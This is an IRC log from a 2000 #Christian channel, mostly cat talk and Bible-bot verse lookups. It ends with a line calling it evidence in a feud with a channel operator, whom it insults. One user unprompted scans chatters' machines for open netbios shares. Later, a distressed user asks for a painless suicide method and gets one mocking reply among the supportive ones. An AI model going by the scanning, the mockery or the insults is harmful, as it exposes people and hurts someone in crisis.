<weird> there is only only one pure calico. .....[01:58] <Eponine`> all the tortis I know have attit udes :P[01:58] <Colin^> calicos are different, Sophoie, on e of our kittens is Cameo[01:58] <Raid> Eponine`: they meow alot too ;p[01:58] <Eponine`> yep sure do, really cute meows : )[01:58] <Raid> and I mean alot.[01:58] <Raid> yes yes[01:58] <Eponine`> they are demanding![01:58] <Raid> Oh indeed[01:58] <weird> calm down guys[01:58] <Raid> if you don't pet them right away, th ey'll go out of there way to get in your way so you do hehe[01:58] <Eponine`> and they ignore you when they ar e tired too[01:59] <Eponine`> hehehehe yep![01:59] <Raid> and they dont purr much[01:59] <Raid> well, they do sometimes, but they me ow more[01:59] <Eponine`> one of mine, licks my fingers no n stop[01:59] <Raid> Bug on the other hand, he's a purrer[01:59] <Raid> and a lap cat hehe[01:59] <Eponine`> hehehehe[01:59] <Eponine`> and a biter when she feels like it[01:59] *** Tomm ([email protected] lstx.swbell.net) has joined #CHristian[01:59] <Raid> hes a cuddly bugsy wugsy[01:59] *** Tomm ([email protected] lstx.swbell.net) has left #CHristian[02:00] *** Twinsen ([email protected] ld-online.no) has left #CHristian[02:00] <Eponine`> aww :)[02:00] <Eponine`> have you got a picture?[02:00] <Raid> Yep, but no scanner[02:00] <Raid> heh
[02:00] <Raid> Bright red and orange.[02:00] <Raid> with the orange stripes hehe[02:00] <Raid> and the huge paws.[02:00] <Eponine`> awww :)[02:00] <Eponine`> both my tortis were strays[02:00] *** Philip15 ([email protected]) Quit ( Broken pipe)[02:00] <Raid> and hes lazy as heck[02:00] <Eponine`> they are both dark with flecs of every colour :)[02:00] <weird> my neice sent me a picture of a big pussy i thought it might be a joke and it was[02:01] <weird> ie[02:01] <Raid> I've seen him stretch out in the mid dle of the kitchen floor. hehe[02:01] <Eponine`> huge paws are so cute :)[02:01] <Eponine`> they look like little lion cubs :)[02:01] <Raid> YES[02:01] <Raid> he resembles a baby lion or tiger ;p[02:01] <Eponine`> hehe[02:01] <Eponine`> kittens rule:)[02:02] <Raid> but because he has a smushed in face , I have to clean his nose and eyes for him. hehe[02:02] <Eponine`> awww[02:02] <Eponine`> my sootie the torti has a smushe d face too[02:02] <Eponine`> i think she might be part persia n[02:02] <Eponine`> her full name is Princess Sootie Lucky Buttons[02:03] *** triasha ([email protected]) ha s joined #CHristian[02:03] <Raid> hehehe[02:03] <weird> recessive gene the torti thingie[02:03] <triasha> mesay u there?[02:03] <Colin^> Have you guys seen those bald cats ?[02:03] <ramdac> ?[02:04] <Colin^> Ugly looking things[02:04] <Eponine`> Sphinx?[02:04] <konfused> those things look cool, lol[02:04] <weird> (am i living up to my name?)[02:04] <Eponine`> with huge ears and really bony[02:04] <tree`> I have... on tv[02:04] * konfused attempts to be wierder than weir d[02:04] *** ^John^ is now known as JohnBRB[02:04] <Colin^> Austin Powers has a bald cat[02:05] <weird> oh ok you have thi stage Konfused:)[02:05] <tree`> those cats are supposed to be speci ally breaded[02:05] <Eponine`> did anyone seen Cats the musical ???[02:05] <konfused> heh[02:05] <Eponine`> I had front row, it was sooo coo l[02:05] * konfused be's weirder than weird[02:05] <Eponine`> I got to touch the kittens :) [02:05] *** thumps ([email protected] l.home.com) has joined #CHristian[02:05] <konfused> there, how was that? :)[02:05] *** WingNut ([email protected] .net) has joined #CHristian[02:05] <Colin^> Hey thumps[02:05] <Colin^> ...[02:05] <Colin^> Hi ya WingNut[02:05] <thumps> grrrrrreetings[02:05] <thumps> heya Colin[02:05] <Eponine`> and one of them took an audience member's coat and did little marching girl (marching kitten, you know what i mean) it was soo cool[02:05] <thumps> ...[02:05] <thumps> wing[02:05] <WingNut> Heya, thumps![02:05] <WingNut> Hey Colin^!!!! :o)[02:06] * weird sees everybody luvs Colin[02:06] *** ramdac ([email protected]. da.uu.net) Quit[02:06] * weird included
[02:06] <weird> so kewl :)[02:06] <Raid> Some people say cats are stupid beca use you can't train them. This isn't true. it's not that you can't train them, it's easi er for them to train you. ;p[02:06] <Eponine`> Colin always meows at me :)))) [02:07] <konfused> my cat plays fetch[02:07] <Eponine`> hahahaha raid, so true![02:07] <Eponine`> konfused, really"??????[02:07] <Colin^> Eponine` have doene for 4 years or more[02:07] <konfused> yup, much better than my dog too[02:07] <Eponine`> yeppers:)[02:07] <Eponine`> with a toy or what?[02:07] <WingNut> Raid: I once heard someone make the observation: Humans train dogs, cats train humans, nobody trains cats. So who is smarte r?[02:07] *** sunshineM ([email protected] a.home.com) has joined #CHristian[02:07] <Raid> WingNut: LOL[02:07] <konfused> yup :) this little stuffed monke y...[02:08] <weird> ferrets[02:08] <eagles`> interesting rofl[02:08] <WingNut> Hey, sunshineM.[02:08] *** sunshineM ([email protected] a.home.com) Quit (Read error to sunshineM: EOF from client)[02:08] <weird> oh and pigs and horses might get a mention[02:08] <Eponine`> cool, confused :)[02:08] <Eponine`> LOL wingnut[02:08] <danimal> does logos have a topical concord ance?[02:08] <Eponine`> knofused, i mean[02:08] <Eponine`> oops[02:08] <Eponine`> konfused :)[02:08] <konfused> heh[02:08] * eagles` is off to do stuff offline... wis h I could remember why I cam on line and hour and a half ago, though[02:09] <Colin^> danimal he will do simple searches[02:09] <weird> bye eagles:)[02:09] <Colin^> Bye eagles[02:09] <eagles`> ooroo[02:09] <Eponine`> byee eagles :)[02:09] <Eponine`> ooroo[02:09] <konfused> bye eagle[02:09] <konfused> s[02:09] <weird> tut such self control:)[02:10] <weird> i have none[02:10] * Eponine` either[02:10] <Raid> Eponine`: My cat seems to know when I'm not feeling well too.[02:10] <Raid> he'll come over and sit by me, and p urr me a little tune.. sometimes even kneed me.[02:10] <eagles`> !skjv apostle[02:10] <logos3> Seek Reply: Matthew 10:2, Mark 6:3 0, Acts 1:2, Acts 1:25, Acts 1:26, Romans 1:1, Romans 1:5, Acts 2:37, Luke 6:13, Acts 2:42, 1 Corinthians 1:1, Acts 2:43, 2 Corinthians 1:1, Galatians 1:1, Ephesians 1:1, Gala tians 1:17, Galatians 1:19, Colossians 1:1, Galatians 2:8, 2 Timothy 1:1 ...[02:10] <triasha> mmmeeeeeeeeesssssssaaaaaaaaayyyyy yyy txt nman dyan[02:11] <eagles`> wonder if....[02:11] <Colin^> Raid my cat does that if I am in b ed with a BAD migraine, he will come and cuddle up for hours[02:11] <eagles`> !skjv acts apostle[02:11] <Raid> when I have the flu it sucks, cause I have to make him get away from me, so I dont get him sick. hehe[02:11] <logos3> Seek Reply: [02:11] <eagles`> no you can't use a modifier[02:11] <weird> dogs lickings are healthy[02:12] <Eponine`> Wow Raid mine does too :)[02:12] <Eponine`> when i broke up with a BF and wa s upset, my cat (the nasty one who was nice back then) wouldnt leave me alone hehehe
[02:12] <Eponine`> cats just seem to know, eh?[02:12] <Raid> yep[02:12] <danimal> colin do you believe that telepat hy exitst?[02:12] <Eponine`> i love when they kneed[02:12] <Raid> bug seemed to know I was talking abo ut him, cause he's perched himself on my lap now.[02:12] <Eponine`> its so cute[02:13] <Raid> he ordered me to move my legs so he could sit comfortably. (he has a good sense of how far into my skin he can put his claws. . hehe)[02:13] <eagles`> sounds like the siamese I used to have[02:13] <Colin^> danimal I used to do it[02:13] *** Maverick ([email protected] ise.net.nz) Quit (Ping timeout for Maverick[203-79-65-231.tnt8.paradise.net.nz])[02:14] <Raid> I consider him to be more then a pet to me. heh[02:14] <Colin^> So yes I do believe you can talk t hrough it[02:14] <Eponine`> hehehehe[02:14] <Raid> hes like.. my best friend.[02:14] <weird> big brother training of chaquita is kinda flawed[02:14] <Raid> always there when I need someone to talk too.[02:14] <danimal> Auras?[02:14] <Eponine`> mine are my children :)[02:14] <logos3> talk through what?[02:14] <Eponine`> Furby is sitting on my computer desk now and purring[02:14] <weird> BUT[02:14] <Eponine`> can hardly move my mouse hehehe[02:14] <logos3> oh :)[02:14] <weird> very loving[02:14] <Raid> hahahahaha[02:14] * Colin^ has to go, Abbigail has made me tw o big hamburgers(my favourates)[02:14] <Eponine`> yikes he's nearly falling off th e desk but he's still asleep and purring[02:15] *** eagles` ([email protected]. uu.net) Quit (Pipe broken, plumber sent for, priority low)[02:15] <Raid> Eponine`: lol[02:15] <Colin^> take care all[02:15] <Eponine`> awww byeeee Collies take care[02:15] <Bond-007> bye Colin^!!!!!!!!![02:15] <Skypark> heheheheh[02:15] <weird> bye Col:)[02:15] <Colin^> mews Eponine`[02:15] <Eponine`> mews :)[02:15] <Colin^> Bye Bond-007, take care[02:15] <Skypark> na na na na na[02:15] <Colin^> Bye weird, nice to meet you[02:15] <Raid> Eponine`: If I don't pet bug when he arrives in my lap, He'll climb on top of the keyboard and sit on it until I acknowledge him.[02:15] * Eponine` 's Furby is the clumsiest cat ev er :)[02:15] <weird> u 2[02:15] <Eponine`> LOL Raid, does he try to type???[02:16] * konfused takes the batteries out of eponi ne's cat[02:16] <Raid> Nope. he just knows my attentions on the computer, and he remedies the problem hehe[02:16] *** jamie^16 ([email protected]) Qui t (Why do people cry when they hear the word goodbye!!!!)[02:16] <Eponine`> lol konfused![02:16] *** Colin^ ([email protected]) Quit (And the Band played on................and on................and on..... .............and on..........................)[02:16] *** Disconnected[02:16] * Raid is away since 02:16:45 - 09/09/2000 ( Auto-Away: Not here ) - Msgs will be saved.[02:16] *** Attempting to rejoin...#CHristian Cannot send to channel* Timer 100 halted
* Timer 101 halted[02:16] * Raid has returned ( Auto-Away: Not here ) - on 02:16:48 @ 09/09/2000 - Away 0 minutes.[02:16] *** Rejoined channel #christian[02:16] *** Topic is 'Encourage each other daily. ( Hebrews 3:13)'[02:16] *** Set by Beukeboom on Fri Sep 08 03:42:57[02:16] -logos3- http://www.forchrist.net - channel website, for rules and other info.[02:16] <Eponine`> aww[02:16] <Eponine`> wb :)[02:17] <Eponine`> Raid, sounds like he's got you w rapped around his little paw :)[02:17] <Raid> lol[02:17] <Raid> yep.[02:17] <Bond-007> grrrrrr[02:17] <Bond-007> stupid internet![02:17] <Bond-007> Why must you disconnect her![02:18] <Bond-007> I was talking to her asking her what time she wanted to be picked up and she got disconnected[02:18] <Eponine`> aww poor Bond[02:19] <Bond-007> That makes me so mad[02:19] <Bond-007> Its 11:19PM so too late to call[02:19] <Eponine`> will she come back?[02:19] <Bond-007> i hope[02:19] *** jamie^16 ([email protected]) has joined #CHristian[02:19] <Bond-007> Im gonna goto sleep soon so I ca n wake up early so I can call her and get directions to her house etc[02:20] *** KJV1611 ([email protected] do-fl.bitstorm.net) has joined #CHristian[02:20] *** ZoOrOpA ([email protected]) has j oined #CHristian[02:20] *** AceRadio ([email protected] scymo.swbell.net) has joined #CHristian[02:21] <Bond-007> well its been almost 5 minutes[02:21] *** logos3 sets mode: +o ZoOrOpA[02:21] <Bond-007> i dont think she is coming back[02:21] *** ZoOrOpA sets mode: -o ZoOrOpA[02:21] *** Disconnected[02:21] * Raid is away since 02:21:32 - 09/09/2000 ( Auto-Away: Not here ) - Msgs will be saved.[02:21] *** Attempting to rejoin...#CHristian Cannot send to channel[02:21] *** Rejoined channel #christian[02:21] *** Topic is 'Encourage each other daily. ( Hebrews 3:13)'[02:21] *** Set by Beukeboom on Fri Sep 08 03:42:57[02:21] -logos3- http://www.forchrist.net - channel website, for rules and other info.[02:21] <Bond-007> hi ZoOrOpA[02:21] <weird> i luv these nicks[02:21] <AceRadio> wb raid[02:21] <ZoOrOpA> hi[02:21] <Eponine`> wb Raid[02:22] *** Luther ([email protected]. net) has joined #CHristian[02:22] <AceRadio> Welcome to #Christian, luther[02:23] <AceRadio> has thatcher been on lately?[02:24] <danimal> yesterday[02:24] <AceRadio> hmmm[02:24] *** weird ([email protected] .net) Quit (Leaving)[02:24] <AceRadio> niv rev 2:3[02:25] <AceRadio> guess the bots are down right no w[02:25] <danimal> !niv rev 2:3[02:25] <logos3> danimal: Rev 2:3 "3 You have perse vered and have endured hardships for my name, and have not grown weary." (NIV)[02:25] <AceRadio> gotta use the '!"?[02:25] <danimal> yup[02:25] <AceRadio> !niv rev 2:5[02:25] <logos3> AceRadio: Rev 2:5 "5 Remember the height from which you have fallen! Repent and do the things you did at first. If you do not r epent, I will come to you and remove your lampstand from its place." (NIV)
[02:25] <AceRadio> ah, ok[02:26] <AceRadio> !niv jeremiah 3:8[02:26] *** TopTed ([email protected]) has jo ined #CHristian[02:26] <logos3> AceRadio: Jeremiah 3:8 "8 I gave f aithless Israel her certificate of divorce and sent her away because of all her adulte ries. Yet I saw that her unfaithful sister Judah had no {fear;} she also went out and c ommitted adultery." (NIV)[02:26] <AceRadio> Welcome to #Christian, topted[02:26] <TopTed> hi AceRadio[02:26] *** ZoOrOpA ([email protected]) Quit (The Moon is up..and over One Tree Hill.....we see the sun go down in your eyes.....)[02:26] *** Shaina` ([email protected]. com) has joined #CHristian[02:26] <AceRadio> Welcome to #Christian, shaina`[02:27] *** CodePoet ([email protected] m) Quit (The quest for faith is a lunar endevour, not warmer and brighter, but darker and w etter.)[02:27] <AceRadio> !niv jeremiah 4:2[02:27] <logos3> AceRadio: Jeremiah 4:2 "2 and if i n a truthful, just and righteous way you swear, 'As surely as the LORD lives,' then the nati ons will be blessed by him and in him they will glory.'" (NIV)[02:27] <Shaina`> thanks for welcome me AceRadio[02:27] <AceRadio> yw[02:28] <Shaina`> :)[02:28] <AceRadio> !niv luke 4:9[02:28] <logos3> AceRadio: Luke 4:9 "9 The devil le d him to Jerusalem and had him stand on the highest point of the temple. 'If you are the So n of God,' he said, 'throw yourself down from here." (NIV)[02:28] <TacoMan> anyone want to see a funny log me ssage me[02:28] <TopTed> !kjv proverbs 30:4[02:28] <logos3> TopTed: Proverbs 30:4 "4 Who hath ascended up into heaven, or descended? who hath gathered the wind in his fists? who hath b ound the waters in a garment? who hath established all the ends of the earth? what is his name, and what is his son's name, if thou canst tell?" (KJV)[02:29] *** Bond-007 ([email protected]) Quit (Ping timeout for Bond-007[17-133.nctimes.net])[02:29] <AceRadio> !niv psalm 1:45[02:29] <logos3> AceRadio: Psalm 1:45 "" (NIV)[02:29] <AceRadio> !niv psalm 14:5[02:29] <logos3> AceRadio: Psalm 14:5 "5 There they are, overwhelmed with dread, for God is present in the company of the righteous." (NIV)[02:30] <TopTed> !kjv luke 4:20-21[02:30] <logos3> TopTed: Luke 4:20-21 "20 And he cl osed the book, and he gave it again to the minister, and sat down. And the eyes of all the m that were in the synagogue were fastened on him. 21 And he began to say unto them, This day is this[02:30] <logos3> scripture fulfilled in your ears." (KJV)[02:30] *** Luther ([email protected]. net) has left #CHristian[02:31] *** TacoMan ([email protected] .net) Quit (Excess Flood)[02:32] *** charisma ([email protected]) has joined #CHristian[02:32] <AceRadio> Welcome to #Christian, charisma[02:33] <Shaina`> how are you AceRadio?[02:33] *** Helt ([email protected]) has j oined #CHristian[02:33] <AceRadio> Welcome to #Christian, helt[02:33] <AceRadio> shaina- i'm good[02:33] *** Helt ([email protected]) has l eft #CHristian[02:33] <AceRadio> shaina- u?[02:33] *** bu2zard ([email protected]) has joi ned #CHristian[02:33] <AceRadio> Welcome to #Christian bu2zard[02:33] <Shaina`> AceRadio: i'm great thanks :)[02:34] <bu2zard> hi[02:34] *** jamie^16 ([email protected]) has left #CHristian[02:34] *** bu2zard ([email protected]) has lef t #CHristian[02:34] *** LARING ([email protected]) has joined #CHristian[02:34] <AceRadio> Welcome to #Christian, laring[02:35] *** LARING ([email protected]) has left # CHristian[02:35] *** space[AW] ([email protected]. net) has joined #CHristian
[02:35] *** jamie^16 ([email protected]) has joined #CHristian[02:35] <AceRadio> Welcome to #Christian, space[aw][02:35] <AceRadio> wb jamie[02:36] <space[AW]> AceRadio hi.. thanx[02:36] *** space[AW] is now known as spaceJAM[02:37] *** aLiCh|gRL ([email protected]) has jo ined #CHristian[02:37] <TopTed> oh hum...[02:37] <AceRadio> Welcome to #Christian, alichigrl[02:37] <AceRadio> 1:39 am cdt[02:38] *** AgnusDei ([email protected] y.bellsouth.net) has joined #CHristian[02:38] *** aLiCh|gRL ([email protected]) Quit ( Ping timeout for aLiCh|gRL[210.23.210.216])[02:38] <Shaina`> it's 2:38am here[02:38] <AceRadio> Welcome to #Christian, agnusdei[02:39] <AgnusDei> good evening ace[02:39] <TopTed> !kjv 1john 2:15[02:39] <logos3> TopTed: 1John 2:15 "15 Love not th e world, neither the things that are in the world. If any man love the world, the love of t he Father is not in him." (KJV)* Timer 100 halted* Timer 101 halted[02:39] * Raid has returned ( Auto-Away: Not here ) - on 02:39:14 @ 09/09/2000 - Away 17 minutes.[02:39] <AceRadio> wb raid[02:39] <Raid> crud[02:39] <Raid> I will sleep soon.[02:39] <Raid> but first, must smoke this cig.[02:40] <konfused> brr tis cold here[02:41] <AceRadio> konfused- grab a blanket[02:41] <konfused> i have one :o[02:41] *** sunshineM ([email protected] a.home.com) has joined #CHristian[02:41] <AceRadio> Welcome to #Christian, sunshinem[02:42] *** WingNut ([email protected] .net) Quit (Ping timeout for WingNut[A020-0450.TULS.splitrock.net])[02:42] *** DisconnectedSession Close: Sat Sep 09 02:42:36 2000
Session Start: Sat Sep 09 12:25:22 2000[12:25] *** Now talking in #CHristian[12:25] -logos3- http://www.forchrist.net - channel website, for rules and other info.[12:25] <Raid> mornin[12:26] *** LC ([email protected] aturn.bbn.com) has joined #CHristian[12:26] *** Txico ([email protected] eb.co.za) Quit (Ping timeout for Txico[cpt-dial-196-30-182-178.mweb.co.za])[12:26] <CiCi> ok everyone, when Raid's in the chan nel, all your machines are going to be scanned so be prepared[12:27] * CiCi waits for Raid to meet her router th at doesn't appreciate script kiddie probes[12:27] <Raid> CiCi: Actually, I've turned the scri pt off.[12:28] <Raid> CiCi: I didn't want to risk having t o explain what netbios open shares are again. ;p[12:28] *** hunnynut ([email protected] e-city.tx.da.uu.net) Quit[12:29] *** prophecy_ ([email protected] ertysurf.co.uk) Quit (Leaving)[12:29] <anyways> anyone else under 15 on this chan nel?[12:29] *** Dmel ([email protected]) Quit (Le aving)[12:33] *** SixSteps ([email protected] est.net) has joined #CHristian[12:33] *** SixSteps ([email protected] est.net) has left #CHristian[12:33] * patience_ will bbl[12:34] <anyways> any girls wanna chat to Jasmine?[12:37] <quietloop> is this a flirt channel[12:37] <anyways> lol[12:37] <anyways> Jasmine is 9 and she's a girl wan ting to chat to another girl her own age[12:38] <anyways> do you call that flirting?[12:38] <anyways> :)[12:38] *** Philip15 ([email protected]) has jo ined #CHristian
[12:38] <CiCi> I"m not her age, but I'll chat with her if she wants[12:39] <LC> If jasmine wants to talk to a Baptist preacher...old enough to be her dad...or grand dad...I will be glad to as well[12:40] <Raid> lol[12:40] <anyways> :)[12:41] <anyways> Thanks for the offer[12:42] <Raid> /msg LC I thought I'd help you out. Heres my number so your lawyer can contact me. (310) 883-2304 Ext 620[12:42] <Raid> doh[12:42] <Raid> stupid paster[12:43] <Raid> if im not there, leave a msg with a number; I'll call you back on my dime.[12:44] * Raid is away since 12:44:05 - 09/09/2000 ( Must find food... Wheres that burger king? ) - Msgs will be saved.[12:44] *** patience_ is now known as pataway[12:44] *** ontario_2 ([email protected] able.net) has joined #CHristian[12:45] *** ontario_2 ([email protected] able.net) has left #CHristian[12:45] *** Adar_Caan ([email protected]. home.com) has joined #CHristian[12:45] *** Philip15 ([email protected]) Quit ( Ping timeout for Philip15)[12:48] *** Nell` ([email protected] .grid.net) has joined #CHristian[12:48] *** Nell` ([email protected] .grid.net) Quit (Wishing you peace, love and Souuuuuuuulll train! - Don Cornelius)[12:48] *** kosmos ([email protected] m.au) has joined #CHristian[12:49] *** ecomaster ([email protected] et) has joined #CHristian[12:49] *** LC ([email protected] aturn.bbn.com) has left #CHristian (Peace & Protection 4.00 FINAL BETA)[12:49] *** ecomaster is now known as eminemx[12:49] <eminemx> hello[12:49] <eminemx> I need help[12:49] <anyways> with what?[12:49] <eminemx> I feel awful[12:50] <eminemx> I just found out my girlfriend ha s been cheating on me...I need some direction[12:50] <Elijah_> ouch...i'm sorry. :([12:50] <anyways> oh dear[12:50] <anyways> I'm very sorry for you[12:51] <eminemx> I feel like dying[12:51] <anyways> That is tough[12:51] <eminemx> I know she is confused[12:51] <Elijah_> been there, done that. :([12:51] <anyways> are you a christian and is your g /f?[12:51] <eminemx> I am ...she is not =([12:52] * kosmos -------(o<----(o<----(o<-[12:52] *** aphrael ([email protected]) Qu it (Leaving)[12:54] <eminemx> I want to die![12:54] <eminemx> but I dont know how[12:54] <eminemx> painless[12:54] <eminemx> fast[12:54] * kosmos slaps eminemx around a bit with a Pirahna[12:54] <quietloop> dying is easy ... living is har d[12:55] <pataway> (((((((((( eminemx ))))))))))[12:55] <quietloop> i want to live[12:55] <quietloop> easy is no goot[12:55] <anyways> hey, there's tons of things I cou ld tell you right now, but I don't think they're things you want to hear just now [12:55] <eminemx> what[12:55] <eminemx> please say something[12:55] <anyways> well[12:55] <eminemx> I am crying like a d*** baby![12:55] <pataway> dying wont solve anything[12:55] * kosmos picks up the nearest cement mixer and slams it on eminemx's head.[12:55] <quietloop> crying is goot[12:55] <pataway> kosmos you7re not helpin[12:55] *** Disconnected
Session Close: Sat Sep 09 13:13:06 2000
These text files comprise the war with Undernet IRC op CiCiso far. As you can see by reading the files yoursel f, She isn'tqualified for her position. She be way too dumb.
![KP EZine 104 September 2015[1]](https://img.pdfslide.us/doc/110x75/563db914550346aa9a99cdd9/kp-ezine-104-september-20151.jpg)
